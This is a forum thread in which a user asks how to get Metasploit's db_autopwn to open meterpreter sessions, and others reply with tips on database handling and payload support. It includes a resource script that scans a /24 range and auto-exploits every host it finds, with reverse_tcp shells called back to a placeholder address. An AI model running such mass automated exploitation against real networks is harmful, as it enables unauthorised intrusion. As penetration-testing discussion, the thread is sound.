
Thread: db_autopwn

  1. #1
    Junior Member JF1976's Avatar
    Join Date
    Jan 2010
    Location
    Kings Lynn, Norfolk UK
    Posts
    31

    Hi all, I've been messing with BT3 and Metasploit for the last few days and I'm after some info on changing the shell used within the autopwn feature.

    I'm trying to include some automated testing, but my understanding is that I need to use the meterpreter payload rather than a standard shell? Can anyone advise or provide some .rc's or .rb's that might be of use?

    thanks.

    load db_sqlite3

    db_create ms_autopwn.db

    use exploit/multi/handler
    set ExitOnsession false
    setg PAYLOAD windows/meterpreter/reverse_tcp
    setg LHOST MY.IP.ADD
    setg LPORT 8080
    set AutoRunScript /scripts/my.rb

    db_nmap -p 1-500 ip.range/24

    db_autopwn -p -t -e

    My understanding is that the .rc files should be as simple as that?

    But clearly not, as this does not work fully and only returns command shells rather than meterinterface? So my .rb file is unable to interact with the vuln hosts.

    Also, when machines are found and shells are started, the db_vulns & notes are empty? Should this information not be populated like the db_services is?

    Thanks to anyone that might provide some info.

  2. #2
    Senior Member
    Join Date
    Feb 2010
    Posts
    146

    Not sure if this will help you, but I know in the earlier releases of BT when using msf you had to destroy the db's before you created them, otherwise you would end up reusing the old one. There was a tutorial on here somewhere; search the archives and see if that works.
    open source = open minds, human knowledge belongs to the world

  3. #3
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Quote Originally Posted by crweedon
    Not sure if this will help you, but I know in the earlier releases of BT when using msf you had to destroy the db's before you created them, otherwise you would end up reusing the old one. There was a tutorial on here somewhere; search the archives and see if that works.
    That is an automatic function now.



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  4. #4

    db_autopwn only supports reverse shell and bind shell, not meterpreter, at the moment.
